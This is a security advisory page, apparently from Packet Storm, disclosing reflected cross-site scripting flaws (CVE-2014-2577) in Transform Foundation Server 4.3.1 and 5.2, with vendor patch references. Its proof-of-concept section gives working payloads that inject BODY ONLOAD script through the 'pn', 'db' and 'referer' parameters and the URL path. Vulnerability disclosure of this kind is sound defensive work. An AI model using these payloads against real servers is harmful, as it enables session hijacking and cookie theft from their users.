exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Transform Foundation Server 4.3.1 / 5.2 Cross Site Scripting

Transform Foundation Server 4.3.1 / 5.2 Cross Site Scripting
Posted Jun 3, 2014
Authored by Juan Francisco

Transform Foundation Server versions 4.3.1 and 5.2 suffer from a reflective cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2014-2577
SHA-256 | 891b715a94170fd468abbd07c7655472ee14b471ec028d6a9f769e3fee3dff15

Transform Foundation Server 4.3.1 / 5.2 Cross Site Scripting

Change Mirror Download
I. VULNERABILITY

-------------------------

Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1
and 5.2 from Bottomline Technologies


II. BACKGROUND

-------------------------

Bottomline offers powerful, next-generation electronic document solutions
for formatting,
personalizing and delivering ERP and business application output.


III. DESCRIPTION

-------------------------

Has been detected several Reflected XSS vulnerability in Transform
Foundation server 4.3.1 and 5.2


1. XSS on GET parameters:


http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE"

http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi



2. XSS on POST parameters:


URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp

PARAMETERS:


db="XSS CODE"
referer="XSS CODE"




IV. PROOF OF CONCEPT

-------------------------


GET:

The application does not validate the parameter "pn" correctly.


http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

http://XXXXXXXXXXXXX/<BODY
ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi


POST:

The application does not validate the parameter "db" and "rerferer"
correctly.


XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp


db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>

and

referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')




V. BUSINESS IMPACT

-------------------------

An attacker can execute arbitrary HTML or script code in a targeted
user's browser, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser
allowing Cookie Theft/Session Hijacking, thus enabling full access the
box.



VI. SYSTEMS AFFECTED

-------------------------

Transform Foundation Server 4.3.1
Transform Foundation Server 5.2



VII. SOLUTION
-------------------------


Patches released by the vendor available on customer portal and information
available here:


Transform Foundation Server 4.3.1 Patch 8:

http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/

SF2351630
SF2364411
SF2391461


Transform Foundation Server 5.2 Patch 7:


http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/


SF2351630
SF2364411
SF2391461



http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577

Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/
)
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close